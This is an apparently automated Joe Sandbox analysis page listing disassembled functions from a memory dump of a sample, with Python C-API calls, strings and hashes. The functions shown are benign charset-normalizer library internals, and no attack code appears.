Instruction ID: e64381764354486364358bce7746d33f3fd7a3488279db1b90082d8a54243cab
Opcode Fuzzy Hash: 32c8cc5da1c5a4c53662f2a02eb56b9d7fcea26900f0b6a46b27aacae368bd4d
Instruction Fuzzy Hash: 143185B1B5A50281EE569B7DEC642B8A3B0EF44B94F58A135DE2D077F9DE2CE484C700

Function 00007FFBAB6A62D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A62F2

Strings

attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFBAB6A62E8
'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A635C
int, xrefs: 00007FFBAB6A63E6

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
API String ID: 1450464846-543361526
Opcode ID: 1291b6d293bf1ed5ae64a56b00bf1b13860b617c90494c0dd0123d29bd04fbc4
Instruction ID: e472e88d7fbd7c9ee3d630547d7f2c3071034a3cf666539294cc4d230a467fa2
Opcode Fuzzy Hash: 1291b6d293bf1ed5ae64a56b00bf1b13860b617c90494c0dd0123d29bd04fbc4
Instruction Fuzzy Hash: D83192B1B4A50281EE569B7DE8642B8A3B0BF44B94F48B134DE6E477F4DE2CE495C300

Function 00007FFBAB6A4EB0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A4ED2

Strings

'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted, xrefs: 00007FFBAB6A4F3C
attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB6A4EC8
int, xrefs: 00007FFBAB6A4FC6

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted$attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
API String ID: 1450464846-1459665959
Opcode ID: 524d028e614f50b41909a65e2b05ff1c14cbdfe08726ae935d08e3c758078267
Instruction ID: 3f60ab99b6dd18af270edd6481931d602a353e1b2cdc3e830b1c1fc7880d8154
Opcode Fuzzy Hash: 524d028e614f50b41909a65e2b05ff1c14cbdfe08726ae935d08e3c758078267
Instruction Fuzzy Hash: 773185B1B4A50241EE469B7DECA42B8A3B0BF84B90F58B135DE2D067F5DE2CD495C300

Function 00007FFBAB6A72A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A72C2

Strings

int, xrefs: 00007FFBAB6A73B6
attribute '_foreign_long_count' of 'SuperWeirdWordPlugin' undefined, xrefs: 00007FFBAB6A72B8
'SuperWeirdWordPlugin' object attribute '_foreign_long_count' cannot be deleted, xrefs: 00007FFBAB6A732C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_count' cannot be deleted$attribute '_foreign_long_count' of 'SuperWeirdWordPlugin' undefined$int
API String ID: 1450464846-3135691889
Opcode ID: 35cb3d4f2bd9c4a5d37c2cde372bddb3ca93a0b263ca3f3a2d664a0bc4599930
Instruction ID: 5c6a82b445f8787b7230caca5d4a4b5c7c065314ef0ca36548d478310040a7ce
Opcode Fuzzy Hash: 35cb3d4f2bd9c4a5d37c2cde372bddb3ca93a0b263ca3f3a2d664a0bc4599930
Instruction Fuzzy Hash: 083194B1B4A50281EE569B7DECA42B9A3B0FF44B90F58A135DE2D467B5DE2CE4848300

Function 00007FFBAB6A8CA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A8CC2

Strings

attribute '_isolated_form_count' of 'ArabicIsolatedFormPlugin' undefined, xrefs: 00007FFBAB6A8CB8
int, xrefs: 00007FFBAB6A8DB6
'ArabicIsolatedFormPlugin' object attribute '_isolated_form_count' cannot be deleted, xrefs: 00007FFBAB6A8D2C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'ArabicIsolatedFormPlugin' object attribute '_isolated_form_count' cannot be deleted$attribute '_isolated_form_count' of 'ArabicIsolatedFormPlugin' undefined$int
API String ID: 1450464846-4047731557
Opcode ID: 1ec334efbc93af8a0daa537c9c947367f6496fe570f3d383ebc24800b9db443f
Instruction ID: 00ef25002a7392659446427140ac3616a44ce9249cb1b1ca4562c2fbbda02d49
Opcode Fuzzy Hash: 1ec334efbc93af8a0daa537c9c947367f6496fe570f3d383ebc24800b9db443f
Instruction Fuzzy Hash: 963196B1B4A50281EE56AB7DEC642B8A3B0FF54B90F58A135DE6E077F5DE2CD4848700

Function 00007FFBAB6A6190 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A61B2

Strings

attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFBAB6A61A8
int, xrefs: 00007FFBAB6A62A6
'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted, xrefs: 00007FFBAB6A621C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted$attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
API String ID: 1450464846-1864222365
Opcode ID: 5778859781aa3561020ceb3b05ef8ae724d89a4ce4f3630b9ef98cc72eb7347a
Instruction ID: b5a6acd232ffce8e01d9d1bc5246ddc255e9a840642a4bc8ecbc8a91d3ac0dfb
Opcode Fuzzy Hash: 5778859781aa3561020ceb3b05ef8ae724d89a4ce4f3630b9ef98cc72eb7347a
Instruction Fuzzy Hash: 633172B1B4A50281EE469B7DECA42B8A3B0BF44B94F58A135DE2D477B5DE2CD4848300

Function 00007FFBAB6A7160 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7182

Strings

'SuperWeirdWordPlugin' object attribute '_bad_word_count' cannot be deleted, xrefs: 00007FFBAB6A71EC
int, xrefs: 00007FFBAB6A7276
attribute '_bad_word_count' of 'SuperWeirdWordPlugin' undefined, xrefs: 00007FFBAB6A7178

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuperWeirdWordPlugin' object attribute '_bad_word_count' cannot be deleted$attribute '_bad_word_count' of 'SuperWeirdWordPlugin' undefined$int
API String ID: 1450464846-3520798986
Opcode ID: 77c8772b984a2595aac65ff4e3f8c76f4f621aa382ae6883f4a9f238d60c89b9
Instruction ID: 0e8769e503fd09cc11ecc1225d1ceeebad34a2693d7b650348431a07be4b3a61
Opcode Fuzzy Hash: 77c8772b984a2595aac65ff4e3f8c76f4f621aa382ae6883f4a9f238d60c89b9
Instruction Fuzzy Hash: 7331A1B1F4A50281EE569B7DEC642B9A3B0BF44B90F58A135EE2E067B5DE2CD4848300

Function 00007FFBAB6A8B60 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A8B82

Strings

'ArabicIsolatedFormPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A8BEC
attribute '_character_count' of 'ArabicIsolatedFormPlugin' undefined, xrefs: 00007FFBAB6A8B78
int, xrefs: 00007FFBAB6A8C76

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'ArabicIsolatedFormPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArabicIsolatedFormPlugin' undefined$int
API String ID: 1450464846-3970786323
Opcode ID: 2e629f3262497ccb22304782c1099c2c36976ab49dc67f606c1b062756317bff
Instruction ID: 0d504d4af62e5f6629a05a430125ce72b4c5e14c16df892756fd1da90dc3393e
Opcode Fuzzy Hash: 2e629f3262497ccb22304782c1099c2c36976ab49dc67f606c1b062756317bff
Instruction Fuzzy Hash: 393170B1B4A50281EE569B7DECA52B8A3B0AF44B90F5CA135DE3E467F5DE2CD484C700

Function 00007FFBAB6A5B50 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A5B72

Strings

'UnprintablePlugin' object attribute '_unprintable_count' cannot be deleted, xrefs: 00007FFBAB6A5BDC
attribute '_unprintable_count' of 'UnprintablePlugin' undefined, xrefs: 00007FFBAB6A5B68
int, xrefs: 00007FFBAB6A5C66

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'UnprintablePlugin' object attribute '_unprintable_count' cannot be deleted$attribute '_unprintable_count' of 'UnprintablePlugin' undefined$int
API String ID: 1450464846-2997357838
Opcode ID: 05d8df805b557c735720644633408e4608b0fbfc31e106f8cc358c40349ee830
Instruction ID: f80b08a7e0115d5c479ae2d8f5f30edb21e4dac5c9fcad69c2174c64e735cadb
Opcode Fuzzy Hash: 05d8df805b557c735720644633408e4608b0fbfc31e106f8cc358c40349ee830
Instruction Fuzzy Hash: C93173F1A4A50681EE46DB7DECA53B8A3B0AF44B94F58A135DE2E067F5DE2CD484C700

Function 00007FFBAB6A7B40 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7B62

Strings

'CjkInvalidStopPlugin' object attribute '_wrong_stop_count' cannot be deleted, xrefs: 00007FFBAB6A7BCC
int, xrefs: 00007FFBAB6A7C56
attribute '_wrong_stop_count' of 'CjkInvalidStopPlugin' undefined, xrefs: 00007FFBAB6A7B58

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'CjkInvalidStopPlugin' object attribute '_wrong_stop_count' cannot be deleted$attribute '_wrong_stop_count' of 'CjkInvalidStopPlugin' undefined$int
API String ID: 1450464846-420147485
Opcode ID: d003440fe6475c9f59ed82b76a527c73c740b1cb598ce72131a3b28642e6cd38
Instruction ID: e2369c21c34985d8cab92db2e71192f26b6a60826778bc6019e51775d2ccb241
Opcode Fuzzy Hash: d003440fe6475c9f59ed82b76a527c73c740b1cb598ce72131a3b28642e6cd38
Instruction Fuzzy Hash: 4131A1B1B4A50285EE469B3DECA42B9A3B0AF44B90F58A134DE2E067F5DE2CD4848700

Function 00007FFBAB6A5130 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A5152

Strings

attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB6A5148
'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A51BC
int, xrefs: 00007FFBAB6A5246

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
API String ID: 1450464846-4240200891
Opcode ID: 536accf797a1bbe65dc8a4d75f5ab69cf8332c7d165fc34bcb50e14afcb09dcc
Instruction ID: d77749b48247a48d59f20951f0363d6bbb7238dd4b15d2e2477c21c995ffabb8
Opcode Fuzzy Hash: 536accf797a1bbe65dc8a4d75f5ab69cf8332c7d165fc34bcb50e14afcb09dcc
Instruction Fuzzy Hash: 893183F1B4A50281EE56DB7DECA43B9A3B0BF44B90F58A135DE2D467B5DE2CD8848700

Function 00007FFBAB6A5730 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A5752

Strings

attribute '_character_count' of 'TooManyAccentuatedPlugin' undefined, xrefs: 00007FFBAB6A5748
int, xrefs: 00007FFBAB6A5846
'TooManyAccentuatedPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A57BC

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'TooManyAccentuatedPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManyAccentuatedPlugin' undefined$int
API String ID: 1450464846-2022335554
Opcode ID: cef47ad94a8524b23c3b55ca13b9a14f862f4f76f789291d3bde506f314e6f26
Instruction ID: 1e11c80d50d98a9a21d2be0c72f3a32c3dcc4e2fc7566a6cf4dbf26afdf9c750
Opcode Fuzzy Hash: cef47ad94a8524b23c3b55ca13b9a14f862f4f76f789291d3bde506f314e6f26
Instruction Fuzzy Hash: 8F3150F1E4A50681EE46DB7DE8A43B8A3B0AF44B90F58A135DE3D467B5DE2CE4848700

Function 00007FFBAB6A8330 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A8352

Strings

'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted, xrefs: 00007FFBAB6A83BC
attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB6A8348
int, xrefs: 00007FFBAB6A8446

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted$attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined$int
API String ID: 1450464846-2037488444
Opcode ID: 1006a038ca7837f55bf567080db1d952f620b641b4547de6e2a8b337716dbb5f
Instruction ID: 0f2f55bbe59e4ac176568df78b9dfd7786aa6d8f09cf7e284e774b70538663de
Opcode Fuzzy Hash: 1006a038ca7837f55bf567080db1d952f620b641b4547de6e2a8b337716dbb5f
Instruction Fuzzy Hash: D53187B2B4A50281EE569B7DEC642B9A3B0FF44B90F5CA135DE6D467B5DE2CE4848300

Function 00007FFBAB6ADED0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

PySet_Contains.PYTHON312 ref: 00007FFBAB6ADEEC
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6ADF38
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ADF4F
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ADF94

Part of subcall function 00007FFBAB6A2920: PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2961
Part of subcall function 00007FFBAB6A2920: PyNumber_Add.PYTHON312 ref: 00007FFBAB6A29B7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29D7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29EB

Part of subcall function 00007FFBAB6A2920: PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A299F
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2A2D

Strings

bool, xrefs: 00007FFBAB6ADF6A
feed, xrefs: 00007FFBAB6ADFAD

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$FromLong_Ssize_t$ContainsNumber_Object_Set_Vectorcall
String ID: bool$feed
API String ID: 3415927029-2849697477
Opcode ID: eb45302e3cef5080e95074768180575d99dfa37b4141d0cc9422c2bb42ee7491
Instruction ID: 954472ff8630d74312636c98f17abfbd48a76d8eed3f786c37469457ae83cb61
Opcode Fuzzy Hash: eb45302e3cef5080e95074768180575d99dfa37b4141d0cc9422c2bb42ee7491
Instruction Fuzzy Hash: BB4155B1A0AA4281EF629F6AEC512BAE370FF44B80F44A039DF6D07775DE2CE4518700

Function 00007FFBAB6A6CF0 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6D1C
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6D45
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6D6E
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6D97
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6DC0
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6DE2
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6E0B

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc
String ID:
API String ID: 3617616757-0
Opcode ID: 527074c6cd195ab482c56603e858959c90a590d2c84401fac90cb2060dcc2367
Instruction ID: 2e65a34acbdc46197f1366e2a6266c5154a4dfba53552a61d432730a73aa39fd
Opcode Fuzzy Hash: 527074c6cd195ab482c56603e858959c90a590d2c84401fac90cb2060dcc2367
Instruction Fuzzy Hash: 6E41A6B690BA4181EB6A5F7CDC5836876B0AB55B7DF14A338CE39421E48F7EA4859300

Function 00007FFBAB6A5630 Relevance: 10.6, APIs: 7, Instructions: 51threadCOMMON

Download Yara Rule

APIs

PyObject_GC_UnTrack.PYTHON312 ref: 00007FFBAB6A563D
_PyTrash_cond.PYTHON312 ref: 00007FFBAB6A564F
_PyThreadState_UncheckedGet.PYTHON312 ref: 00007FFBAB6A5659
_PyTrash_begin.PYTHON312 ref: 00007FFBAB6A5668
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A5695
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A56BE
_PyTrash_end.PYTHON312 ref: 00007FFBAB6A56D9

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
String ID:
API String ID: 2819143443-0
Opcode ID: 1c16e7615a0f82207d80faaa12bf775c49de3bd6999ef687b31fc543c5e7b3c6
Instruction ID: 8f80ef187a4c1c6b30cdc92d355cd15dd88b9991010b8082888701714dfdb824
Opcode Fuzzy Hash: 1c16e7615a0f82207d80faaa12bf775c49de3bd6999ef687b31fc543c5e7b3c6
Instruction Fuzzy Hash: B1210CF291AA0281EF568F79DD58378B2B0AB58F69F14A234DD39062F4CF7DD4458240

Function 00007FFBAA461150 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 40COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON312 ref: 00007FFBAA463607
_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA46363A

Part of subcall function 00007FFBAA4611B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAA4611E2
Part of subcall function 00007FFBAA4611B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAA4611FA
Part of subcall function 00007FFBAA4611B0: PyType_IsSubtype.PYTHON312 ref: 00007FFBAA46121D

Strings

str, xrefs: 00007FFBAA46362C
argument 2, xrefs: 00007FFBAA463625
normalize, xrefs: 00007FFBAA4635FA, 00007FFBAA463633
argument 1, xrefs: 00007FFBAA463619

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

